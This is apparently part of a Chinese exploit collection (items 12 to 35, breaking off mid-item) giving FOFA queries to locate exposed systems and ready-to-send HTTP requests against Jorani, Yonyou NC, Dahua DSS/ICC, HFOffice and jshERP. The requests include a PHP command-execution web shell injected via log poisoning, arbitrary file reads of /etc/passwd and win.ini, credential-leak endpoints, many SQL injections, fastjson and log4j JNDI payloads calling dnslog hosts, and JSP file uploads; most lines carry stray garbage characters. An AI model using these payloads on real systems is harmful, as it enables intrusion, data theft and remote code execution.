5 X" e! j( p/ W KCache-Control: no-cache
' F9 A+ _) V& F. v4 pUpgrade-Insecure-Requests: 11 h# s$ p! V4 Z6 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ @' Q( n& _( E; o0 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 |6 c) i( {9 A4 Y+ ^. t; _Accept-Encoding: gzip, deflate
8 R* J* |, X. `0 sAccept-Language: zh-CN,zh;q=0.9,en;q=0.84 b. X: v0 U+ E1 {/ |0 C7 O p7 A
Connection: close
: I- W4 C/ L' t; G6 o' r+ j" K! U$ C5 W+ L
% K3 P7 ?+ k7 L" s+ O0 v
12. Jorani < 1.0.2 远程命令执行8 \! E( l, Z. ?* N9 S
FOFA:title="Jorani": l% f8 l: e, a: _" I$ W
第一步先拿到cookie
5 q! E$ V5 T8 t. _9 r9 [GET /session/login HTTP/1.1
. A# y2 t1 q0 `( Y8 R2 ]Host: 192.168.190.30
$ m! s8 ]% _+ O! h, d( a3 v W& qUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 M3 R1 a& R- }2 G) I; ^( @3 A: r
Connection: close
6 n1 a( [8 o) S' ]& HAccept-Encoding: gzip- h; t7 B( B8 F% Y. F( H6 l7 R
, U- ~9 l$ [0 D; z2 v; q
3 M9 w3 W) E% A' i( V0 G
响应中csrf_cookie_jorani用于后续请求+ Y$ F/ a( E: S& E
HTTP/1.1 200 OK! q. }7 z6 |& s4 Y+ r y+ l+ }
Connection: close! j5 Z' n& q$ h w: l4 N0 h% @
Cache-Control: no-store, no-cache, must-revalidate
: Q3 y; J$ M8 |1 @- D& oContent-Type: text/html; charset=UTF-8. n4 X! ]; a$ U) I
Date: Tue, 24 Oct 2023 09:34:28 GMT
4 ?) |- v1 O, W% S. Z2 j' B" R* HExpires: Thu, 19 Nov 1981 08:52:00 GMT
/ t# l. P& X1 h, c$ g, y9 M T3 qLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
' X( {& h( ]: e' N) ^5 rPragma: no-cache
0 X- |; c$ s' q& a( J! NServer: Apache/2.4.54 (Debian)
7 w) o, N) {! ^* i" r& }/ N+ S& CSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/% e$ \5 v, O! Y) J7 o u
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
! r8 g+ ?' ~) w' S; C- ], Z& C: EVary: Accept-Encoding4 Z$ W7 q2 G% T* l* g8 g& g
" `* R4 N) P& \/ i' {' W5 ]" H" U+ d/ r* ^) y5 ^% r5 H2 S
POST请求,执行函数并进行base64编码
1 F) j) o8 `2 i/ k6 Y: l! wPOST /session/login HTTP/1.1
0 V" _4 K m. b7 T2 R6 x6 ^Host: 192.168.190.30
0 D; q# O2 e+ p$ O4 A& F5 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& B" d: {! _/ V( V) k! M4 G9 ~" d% @
Connection: close
2 P |- {' `/ y2 m% W3 X4 UContent-Length: 252) V0 f1 @8 m+ Y T! }/ N' p6 _
Content-Type: application/x-www-form-urlencoded8 A1 M! a7 S) `: W3 N
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r$ o- d" b; `) c3 R
Accept-Encoding: gzip
# c# \- q2 k: i+ _; `3 x! g8 K/ K* a
2 q8 P# ], r$ e+ G& i: xcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor0 K0 T9 d [1 i% Y) ~" _, W
2 a1 Q) h* d( I% y. ]
T3 s; A2 j& K% ]: ~) v" f2 Q! B0 X( z0 i% w, U) p% ]) }
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串4 y" D; { V" { l
GET /pages/view/log-2023-10-24 HTTP/1.1
3 E. D, n6 e. q* o& [7 t) t6 pHost: 192.168.190.30$ h( n( F+ P" q& {/ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( X. O3 k" J4 y- j- Z
Connection: close. ? [5 ~- Q, F+ K9 J5 b+ ^1 g
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r! b R3 b5 M# p; o7 C- Q
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= ^- d1 P. w, p' I8 D9 ]4 ^% U7 l
X-REQUESTED-WITH: XMLHttpRequest g& b7 s1 n7 r3 ^8 e$ z
Accept-Encoding: gzip+ [4 K6 e; ]2 n, b
. }* I5 o7 T w3 s
! G6 [# c) j% C# s m+ ^
13. 红帆iOffice ioFileDown任意文件读取0 ?* ?! n. ~4 G) b- @7 ?
FOFA:app="红帆-ioffice"% v/ w7 i. t* |$ T( t
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.19 C, \2 N; e, l5 K; \
Host: x.x.x.x: X1 [* z: A; }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. Z+ B2 R; @. {2 [
Connection: close8 e. o# P/ R6 ]" W, W U- N( H. a* w7 A
Accept: */*
6 K% ]& E7 A" gAccept-Encoding: gzip- s2 ?7 G! q$ U# M
- C& n5 U! {/ o$ o% v1 U
$ ^( u5 z g+ F5 D; E8 |/ X14. 华夏ERP(jshERP)敏感信息泄露
3 _6 v" Z, i; n0 ^FOFA:body="jshERP-boot"
- Q, p( H0 {" z/ `泄露内容包括用户名密码
* l S8 Y( R9 l! uGET /jshERP-boot/user/getAllList;.ico HTTP/1.19 a( f: {- q% D
Host: x.x.x.x5 _ b" J; I8 Q3 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
! [1 C$ W. n* U) S/ ^! I) ]! CConnection: close
" w0 y5 }8 R. W$ k+ z9 iAccept: */*6 |" j$ s& Y" q0 d
Accept-Language: en
3 ^6 p9 h6 Z$ n" k$ LAccept-Encoding: gzip
3 Y- p! S6 j; x. d9 ?0 N) e- Y# N$ D
! z6 Z0 B5 @7 ]4 y5 g: l9 {1 C& Q( c/ t! y! J [+ R
15. 华夏ERP getAllList信息泄露
% k0 f# {5 g' w/ vCVE-2024-0490% N* v8 {4 D/ e* I! y
FOFA:body="jshERP-boot"2 x6 C, h# O' v5 ?( m* [2 f
泄露内容包括用户名密码
M2 Q: K g0 \- gGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1( L+ S3 @5 B: h3 U7 o- b: C
Host: 192.168.40.130:100
) @$ e6 r/ _. _* i; D' m* pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36- _/ b( @0 {& {8 p$ e2 u2 c, r
Connection: close
- `; I0 q0 b( _) VAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
$ K' u- k- w5 \! J) Z& \5 H% UAccept-Language: en8 j4 j3 Z; n: c( W/ o
sec-ch-ua-platform: Windows+ G) C( W1 m, M; D
Accept-Encoding: gzip
5 ^- k! A4 n1 ]% O5 k* ^' ^# [. b% b+ L8 e! B; e7 {
! u9 w7 R! j6 g/ y/ b16. 红帆HFOffice医微云SQL注入
( | u+ J6 b: [$ bFOFA:title="HFOffice". d) O4 B3 k2 p' W+ W
poc中调用函数计算1234的md5值
3 A6 R2 P1 q0 B- qGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
+ d$ m8 f- V$ T7 WHost: x.x.x.x
# z) g0 P3 v/ J3 V& h6 FUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36( M4 d! u: ]- M0 ^% Q# H, X1 m; m
Connection: close
3 j' h$ @- c2 V7 Q. s" k- x4 vAccept: */*( @- N C+ Y) h, h" N3 z
Accept-Language: en* [( k6 z, x0 J% y( o0 t5 u" k, {
Accept-Encoding: gzip" v* L+ n" l4 C1 V7 [
1 F c o1 e' ^ T
- | n+ G2 p6 d7 t" @17. 大华 DSS itcBulletin SQL 注入( Y% W# N2 w+ ?
FOFA:app="dahua-DSS"" v+ a% G( l1 ]- s! Q( p' O
POST /portal/services/itcBulletin?wsdl HTTP/1.18 y1 A( z# b2 T& e5 d
Host: x.x.x.x; Q# ^. a5 g7 _: M9 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 G1 `8 x% L# w: P5 UConnection: close
- V0 O% Q0 m9 s+ Y- D" YContent-Length: 345$ i' Q8 t( a( L* T+ {. j
Accept-Encoding: gzip
5 x1 {) r2 j$ q+ c F8 M2 D5 C) e. A- F! O a& O: J& m
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% ?8 X, t5 o1 b% N r0 I" G<s11:Body>4 ^/ }6 b( r& u8 R+ \9 b3 P
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; o% T# H9 {8 U; [ <netMarkings>
4 ] J1 L" {: q( | (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
# Y: }! x& @# I; ^3 _ </netMarkings>8 B9 A3 \9 s7 e3 b$ `* @2 L
</ns1:deleteBulletin>5 l4 w- K0 D& d0 F! o4 H
</s11:Body>( ?4 ]( b2 x! Z$ a
</s11:Envelope>
' c8 ?1 y4 Q+ p$ P7 _ U& M" D0 y8 l; ~! O6 _) t/ d1 a
% Q7 h. F! w$ K& A: b" t3 T0 x9 R' W18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- G N. Q+ v3 ^' X- UFOFA:app="dahua-DSS", }1 l$ [6 |% [- J6 B: R
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
, O6 K; R3 E3 k* ?/ E) i4 }Host: your-ip
" N4 x7 }, D6 `# _( tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* A" z, m; I6 _% o
Accept-Encoding: gzip, deflate' v- [* F' s9 p: l# |8 m( a& R
Accept: */*! G( i+ E% N# I3 y( L
Connection: keep-alive$ c+ `/ l) G& w" \2 }# G% K) p
/ \4 ~1 k" V* b9 v, q7 B+ p
7 Y% U7 i4 v3 b+ V3 F* o) P2 \
' S- A: N! _" _; L
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
6 X, Z9 m v& E* C. E: r7 WFOFA:app="dahua-DSS"
, Q6 A0 N# x, \- C3 i% b2 VGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1, u* ^# S3 P) _2 @/ A
Host:. m4 C. u! i7 f( } D9 Q7 p
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 j0 [8 d% t/ Z. k* B$ w
Accept-Encoding: gzip, deflate
# V1 b& k' U; d! ZAccept: */*8 d( m: b4 @: u, F
Connection: keep-alive5 J7 \# }* g( L* r+ e7 L, ^
O' z7 V) u6 C( w
+ V4 n1 V& j$ a$ H* i8 T' f# f
20. 大华ICC智能物联综合管理平台任意文件读取" \, T5 A( x- w- k" w
FOFA:body="*客户端会小于800*"
" V; N r4 l4 U/ L P, XGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1+ O5 S0 |; R$ r3 M. c0 c/ K) D
Host: x.x.x.x! j: t7 ?8 R' L2 Z9 X' q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; ~: \8 s9 t- q9 D+ n$ P
Connection: close- R6 e5 h8 z4 t8 C
Accept: */*4 {9 n4 W! Z# d6 V
Accept-Language: en
" a5 y# ?& D# H% `9 I/ I cAccept-Encoding: gzip
$ C# ^( ^1 S& p D
6 O d: `2 f0 e; g1 d0 H* w$ s8 [) `$ v
21. 大华ICC智能物联综合管理平台random远程代码执行 ] C% Q9 R: M3 u, u% d8 U1 E
FOFA:icon_hash="-1935899595"
" E* ^6 w! {3 w6 Y' ]- h$ FPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
9 S% ]% W( y+ c1 G! m( OHost: x.x.x.x5 I# C. E( z" r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. O G# c% D: `% D
Content-Length: 161, Y9 K) N" I s' j" w. S; s
Accept-Encoding: gzip* d+ w% P: I {% ~
Connection: close
% ^$ U' v# `, lContent-Type: application/json;charset=utf-8$ x/ `6 s6 K0 f6 r
# C5 d) v, Z' T6 f
{
8 C% n* N& h" I U6 I X( I8 c"a":{
* c# {: W; V A; f+ p/ m; a "@type":"com.alibaba.fastjson.JSONObject",( G4 ]$ N9 K0 n! C* L* }
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}" q8 n) k+ p7 h
}""
! Z8 X1 U2 @0 z' d* f! C; P}4 v( f r% n+ u3 k; I* o- ]
; f& ~: Z5 y( S! O
$ P/ z) Y) u2 a4 g- q7 a0 \22. 大华ICC智能物联综合管理平台 log4j远程代码执行/ ^2 r" U3 s/ P7 H# Y* L
FOFA:icon_hash="-1935899595"
% G8 C$ A% ?% G+ `+ dPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1! C5 n( H) C* \$ l
Host: your-ip
! q' H0 ]+ L7 O; U0 e% VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% A2 a/ [. o% \( }7 b$ ]% O# CContent-Type: application/json;charset=utf-8
! z$ K8 o; A4 e$ O) `6 w0 W
! e+ c1 o$ e) {' {# z{/ n+ |+ z( {5 d$ U, |
"loginName":"${jndi:ldap://dnslog}"
0 e% i1 X1 W! y3 O}
$ M" q& k; _( a( e" j+ z3 ? O- `9 {, r. r5 Q, y. E
. _8 c; ]% W2 a$ U: Y9 `- A
- _: a8 P" k0 d$ u# I
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 c$ t: M& J! |) f9 c. e" O6 A
FOFA:icon_hash="-1935899595"
! Z7 z& F) V' J6 M: p* D0 i/ a0 K0 dPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( L L$ F# o- s4 w( N9 j" }6 EHost: your-ip
3 {- g- x. k/ h% l LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 t- C3 C8 n1 c+ f9 i
Content-Type: application/json;charset=utf-87 g0 h/ E' t' j
Accept-Encoding: gzip1 W, \* U* Z; ~1 g; ?
Connection: close6 i& o1 F% Z5 y }5 D. E8 c. n! G! \
. M8 x3 Y- c( w6 \0 s: _
{
5 b X9 |( x( Y; o% L M6 Z "a":{
" }* P" X5 x/ f; q6 n$ b: Y "@type":"com.alibaba.fastjson.JSONObject",) W9 ~, v1 c2 ]& H
{"@type":"java.net.URL","val":"http://DNSLOG"}
0 K+ j4 N0 V# }2 c2 O }""
$ n# @/ M: ], [}& Z E5 K- e1 o$ ], q P
. S9 A; E1 A7 a" V8 k% _% ~9 L' b; C" O
24. 用友NC 6.5 accept.jsp任意文件上传
! ]0 S# z7 e J) {6 _FOFA:icon_hash="1085941792"& J7 L/ }7 Q* C0 `9 T
POST /aim/equipmap/accept.jsp HTTP/1.14 J( ]' q( H1 d, P) u; p: ~
Host: x.x.x.x% L3 T% @; K5 k7 m2 |3 A8 k* g
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36) o5 K: t# a$ W# g8 {3 j
Connection: close t$ S8 r& `" o \' {+ O
Content-Length: 449* h: {+ ^" Q! v+ [+ t" _4 W" Z
Accept: */*
9 D+ P" o5 C( M( { j& y: AAccept-Encoding: gzip- [+ e k4 Z( b, `" O7 e7 p
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ U) V; ^. _0 R4 }6 R) {
; A6 n: e% x* M: ` d0 _% v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
+ r5 Z( ^: S" E; mContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"' L5 Q; {, M. l9 K3 R" R& h. t; W
Content-Type: text/plain d% {6 c% w# B+ U4 ]
4 F$ F( c* X3 b( l* v' w
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>( q8 J; z) r) \2 v
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
& W8 ~: I- M1 g3 I. f: ]Content-Disposition: form-data; name="fname"3 J& k- @5 X3 z
: I' e6 o) l9 K1 ` L% J5 T
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
! u& l& F- u# ?! p! K; ^$ f1 L0 n9 H-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
; D1 R) R2 p7 t8 i( A+ N& u
) e! i. q. ^: ^+ Z, G% \9 p6 I% x& D
25. 用友NC registerServlet JNDI 远程代码执行
( x8 J3 U A: u9 ^8 A6 Q- z# tFOFA:app="用友-UFIDA-NC"
2 D9 H- K7 g" Z+ f( j2 G1 yPOST /portal/registerServlet HTTP/1.12 _/ {- t$ D4 f+ D0 Z- Z2 b w
Host: your-ip
# u- S" Y- a5 T& ]$ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0- D; z) E5 S! D" G, T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
( n! \2 ^ @, j" s0 L6 W1 dAccept-Encoding: gzip, deflate
4 N# g& s7 e& x1 J) _. ]Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
0 b1 {" Y7 h9 G4 |' RContent-Type: application/x-www-form-urlencoded: }" N; m6 F9 `$ e
, `2 b2 R! F: G. i: K
type=1&dsname=ldap://dnslog# s& h8 ?9 [! c r! T
. v) X& [1 |4 A# ~; K+ o9 ^3 \& ]% r" s4 u! T
8 K2 Q0 K# `% t+ j" m( j. B
26. 用友NC linkVoucher SQL注入$ {/ R! @% s" v( \
FOFA:app="用友-UFIDA-NC"
( L/ J' P7 O) f/ b) T0 o/ fGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1. Y3 q; t- y# h) ?9 k- v
Host: your-ip0 \5 ~/ F2 {2 ~7 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Z5 C/ k9 w( ~: X5 NContent-Type: application/x-www-form-urlencoded
# f+ S K5 W+ P0 U) UAccept-Encoding: gzip, deflate
: v9 G; N- u; W0 I2 h) \& x. lAccept: */*
+ ]3 O" t1 l% v' xConnection: keep-alive% V5 ~8 g7 t& ?. U4 b. ^% n) e
. c4 T* G: x7 B& w1 }3 A& u
# `/ }+ @! j' P! Q5 H6 o
27. 用友 NC showcontent SQL注入
# P# L) O5 c- |6 d2 bFOFA:icon_hash="1085941792"9 Z) s/ x$ ?9 E. `/ @7 e1 W
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
5 x2 `7 g! D0 m- C) r+ UHost: your-ip! W' O8 H: t" T! J p9 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' g2 S- b& O. v% G" q" E0 g
Accept-Encoding: identity- @, d! O( S& G8 w5 t3 l
Connection: close, E' i0 M g9 P7 J0 e0 l
Content-Type: text/xml; charset=utf-8( S7 D* q0 J0 @0 K6 \ r
7 k2 Y' r7 }! Z+ A; d
' @1 i3 C" u* Y, r& @# ^
28. 用友NC grouptemplet 任意文件上传1 D* A( }1 J1 c
FOFA:icon_hash="1085941792"
; ?% l+ D9 h& U pPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1* N6 r1 n3 {, S2 ^) P
Host: x.x.x.x. g- Z2 J4 P& u: {9 M. {- M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
, p6 J6 Q s j% \( s# s' y9 J; L+ gConnection: close
8 n7 J' `2 ^2 p" m! BContent-Length: 268
5 @ b; h, ]) z2 Q% }1 s2 | EContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) q1 _$ Q- K7 M9 wAccept-Encoding: gzip
8 d0 t) A: ^+ V2 w: k. o
+ e: Z* L0 w) Q: F. Q3 X------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk8 u4 }. ~' G5 V$ |# y! B1 q( B
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
7 ]* f C7 j2 E* f) T. I- XContent-Type: application/octet-stream3 t1 `* _) `& \: e: A3 }; S
' W7 T$ o2 m: V% R2 G/ K# }6 p( H
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>- `7 j. v5 d. G) W
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--5 F) I" f d& z+ {5 q Y0 c* J
b" h- x+ ?( G# F N+ f, U" Y& e& I
/uapim/static/pages/nc/head.jsp
% m) X$ h2 L& r, `. y4 J$ I8 k" t, a& N5 D
29. 用友NC down/bill SQL注入. x) l& c- p# K4 @8 d1 e: `# r
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* j5 o# F# e \3 K9 \$ c0 j' C& X
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.13 Z8 z+ T; c! H" Z- r X; l+ G. b
Host: your-ip# ]& m+ k) ?0 ]* W% i: e7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 t9 U. W& C, |! S4 nContent-Type: application/x-www-form-urlencoded
1 `0 Z3 i+ e6 M: z( cAccept-Encoding: gzip, deflate
2 E. f8 O* [: Y) kAccept: */*6 x/ p9 u& p; Z
Connection: keep-alive+ N9 B4 E1 D. E C/ `. j
/ x/ u# u e! H: O
% V0 o3 [) q. | [) n30. 用友NC importPml SQL注入
% H" {( ~5 P6 p3 ^3 q+ fFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
+ {6 r ~7 j6 g5 F. n9 U, Z+ ]6 MPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1& g& E6 e6 L' u$ H( i# A6 @& x5 V
Host: your-ip
0 c" e l1 L; a& N) MContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
; W2 M ^7 ?( s6 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.368 |- [9 j6 L# M$ n) S
Connection: close, G1 ?( P9 z7 O J$ a8 K w
- F! _8 J. T- K! |' E+ E- @/ p------WebKitFormBoundaryH970hbttBhoCyj9V8 R, @* V# K% c# J2 e9 u
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
# }, C. L/ g7 l$ T" IContent-Type: image/jpeg) b2 W9 h1 u% i$ F% n
------WebKitFormBoundaryH970hbttBhoCyj9V--
: G# ^% {7 P$ ^$ P
- r1 S7 J, i C$ l' `
! e4 [, r3 S$ O31. 用友NC runStateServlet SQL注入
3 ^1 K9 H3 U' |6 }1 d9 h4 }version<=6.5
6 [' Y6 c. B* dFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif": S( s& e' J4 |, v% N+ d
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 u: h6 @# l: ?8 lHost: host
+ a% c. f! M/ j' ^; L4 k+ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.363 x2 `9 R4 b" K0 E) k9 W# E4 X
Content-Type: application/x-www-form-urlencoded
' i( |7 f+ C# g7 X2 i4 O+ q# c @
& z2 {, Y1 o: t# G% n* j1 o9 V, ^! K8 j7 P
32. 用友NC complainbilldetail SQL注入6 f9 p& s: O5 @, w' N2 i+ @/ [: R
version= NC633、NC65
. _5 M. w! K) ^FOFA:app="用友-UFIDA-NC", a( [7 z6 K* p* ]* t% \
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& ?& P) d& |5 T* u, R. oHost: your-ip& l# Y( z/ _8 d$ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ E" c. f0 ~2 A% T
Content-Type: application/x-www-form-urlencoded/ H+ f+ O9 o* @: l `- `
Accept-Encoding: gzip, deflate
/ i) ]# N; Q6 IAccept: */*" w+ q" Z/ J9 [# Q$ E1 G
Connection: keep-alive. x9 p7 I3 \9 m7 A1 \3 o
, s* w) u% p2 z" ]( c1 Z) I
4 Y. I/ g, J. v! h& f/ t6 Q/ [
33. 用友NC downTax/download SQL注入
/ e/ I7 _# h& u# h) [version:NC6.5FOFA:app="用友-UFIDA-NC"
& @) O9 ] F+ W4 zGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ R0 i% M. Y2 b& _ f) U$ jHost: your-ip; t0 F$ t2 R$ g3 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, c& t8 n, I6 l
Content-Type: application/x-www-form-urlencoded5 y' W; O9 `& Q% G$ c- e
Accept-Encoding: gzip, deflate
# f& S) s# g1 C7 \5 Q7 G5 yAccept: */*4 e+ Y9 u( d; p" b D
Connection: keep-alive
5 Z5 h$ }* E# n, ^0 Q) g) F
8 t% g8 ~( L' d* Q
6 G) [0 Z. t6 j) c6 n34. 用友NC warningDetailInfo接口SQL注入: v- J0 \* K1 K8 j! O
FOFA:app="用友-UFIDA-NC"
+ o$ V) R. `4 C3 u a2 x" a# X% PGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 i% t& Z/ u" ? L1 ZHost: your-ip. a5 N% H. i6 x3 a- {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 @0 m, a8 r- B/ O; g! z4 F2 oContent-Type: application/x-www-form-urlencoded
- h9 I" b+ o& J m* VAccept-Encoding: gzip, deflate( i0 ^* _/ c. v! R# V. ~9 k
Accept: */*5 t( V2 G o4 y; t9 Q0 [6 Q) ]
Connection: keep-alive
/ ^/ \( }, R) x* V. k7 z
9 P) s0 M8 B( y7 Q$ r6 M& a# m4 V) ~, u3 Q8 a1 e- G% A% @4 P8 g
35. 用友NC-Cloud importhttpscer任意文件上传+ i+ v# y! G( N( B- l9 Y
FOFA:app="用友-NC-Cloud"
4 s. g8 k1 ?* IPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
7 Z9 V3 ^* k0 qHost: 203.25.218.166:88883 J' a3 A% D. [" K& X; G
